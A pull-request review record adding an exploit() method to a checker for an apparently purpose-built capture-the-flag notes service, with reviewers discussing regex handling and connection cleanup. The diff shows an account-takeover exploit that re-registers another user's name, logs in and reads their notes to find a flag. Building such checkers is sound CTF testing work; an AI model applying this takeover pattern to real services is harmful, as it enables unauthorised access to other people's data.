### PR TITLE
implement exploits in checker.py

### PR DESCRIPTION
**Pull request by ldruschk**

### CODE REVIEW

**Comment by ldruschk** [comment]
the CI for the Rust and C# checker failing is expected, since they do not implement the exploit method yet

File: checker/src/checker.py [hunk 1]
```diff
@@ -378,8 +379,52 @@ def exploit(self):
...
+                user_name = user.split()[-1]
+                conn.write(b"reg %s foo\nlog %s foo\n list\n" % (user_name, user_name))
+                conn.read_until(b">")  # successfully registered
+                conn.read_until(b">")  # successfully logged in
+                notes_list = conn.read_until(b">").split(b"\n")[:-1]
+                for note in notes_list:
+                    note_id = note.split()[-1]
+                    conn.write(b"get %s\n" % note_id)
+                    data = conn.read_until(b">")
+                    if flag := self.search_flag_bytes(data):
```
Comment (domenukk) [inline checker/src/checker.py:405]: As discussed in chat, I don't see a benefit of `_bytes` method, if there really are differences in behavior between bytes and Unicode regexes, we should make sure the gameserver tells us which one to use, and then we should encode or decide accordingly.

**Review by domenukk — APPROVED** [review]

File: checker/src/checker.py [hunk 2]
```diff
@@ -378,8 +379,52 @@ def exploit(self):
...
+                        return flag
+            raise BrokenServiceException("flag not found")
+        elif self.variant_id == 2:
+            conn = self.connect()
```
Comment (domenukk) [inline checker/src/checker.py:409]: Does python tidy up connections nicely, even if we don't use `with` here?

Comment (ldruschk) [reply checker/src/checker.py:409]: I don't think so, but since this is only the epxloit method, it should not really matter

Comment (ldruschk) [reply checker/src/checker.py:409]: I think the bigger problem is that we never clean up connections when an exception is thrown

Comment (domenukk) [reply checker/src/checker.py:409]: Wouldn't `with` do exactly that?

Comment (ldruschk) [reply checker/src/checker.py:409]: That depends, does the SimpleSocket base class implement the `__enter__` and `__exit__` methods? Or rather, does it inherit them from the base class?

**Pull request merged**